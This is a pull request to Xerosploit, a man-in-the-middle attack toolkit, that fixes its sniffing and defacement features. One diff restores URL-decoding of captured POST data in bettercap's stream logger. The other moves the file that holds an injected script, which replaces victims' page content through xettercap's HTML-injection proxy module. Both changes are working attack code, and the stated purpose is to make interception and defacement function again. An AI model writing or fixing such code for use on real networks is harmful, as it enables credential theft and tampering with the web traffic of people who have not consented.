### PR TITLE
Fix unable to sniff and deface.

### DIFF
--- a/tools/bettercap/lib/bettercap/proxy/stream_logger.rb
+++ b/tools/bettercap/lib/bettercap/proxy/stream_logger.rb
@@ -86,7 +86,7 @@ class StreamLogger
       name, value = v.split('=')
       name ||= ''
       value ||= ''
-      msg << "  #{name.blue} : #{URI.unescape(value).yellow}\n"
+      msg << "  #{name.blue} : #{URI.decode_www_form_component(value).yellow}\n"
     end
     msg
   end

--- a/xerosploit.py
+++ b/xerosploit.py
@@ -771,11 +771,12 @@ def main():
 
 									
 									content = """<script type='text/javascript'> window.onload=function(){document.body.innerHTML = " """ + file_deface + """ ";}</script>"""
-									f1 = open('/home/home/xero-html.html','w')
+									make_directory = os.system("mkdir -p /opt/xerosploit/xerodeface")
+									f1 = open('/opt/xerosploit/xerodeface/xero-html.html','w')
 									f1.write(content)
 									f1.close()
 
-									cmd_inject = os.system("xettercap " + target_parse + target_ips + " --proxy-module=/opt/xerosploit/tools/bettercap/lib/bettercap/proxy/http/modules/injecthtml.rb --js-file /home/home/xero-html.html -I " + up_interface + " --gateway " + gateway )
+									cmd_inject = os.system("xettercap " + target_parse + target_ips + " --proxy-module=/opt/xerosploit/tools/bettercap/lib/bettercap/proxy/http/modules/injecthtml.rb --js-file /opt/xerosploit/xerodeface/xero-html.html -I " + up_interface + " --gateway " + gateway )
 									deface()
 							else:
 								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")


### PR DESCRIPTION
1) Fixes #331 . Now xerosploit can capture post data successfully.

As the `URI.unescape` is deprecated for Ruby 2.7.x so, we need to use `URI.decode_www_form_component` for URL decoding.
https://ruby-doc.org/stdlib-2.5.3/libdoc/uri/rdoc/URI/Escape.html#method-i-unescape

2) Fixes #333 
 In Xerosploit.py line `774 and 778` there is `/home/home/xero-html.html` , Here not everyone have their username as home so it fails to create and open file. I have made changes to it so that it will now create a `xerodeface` directory inside `opt/xerosploit/` and store the `xero-html.html` inside it. 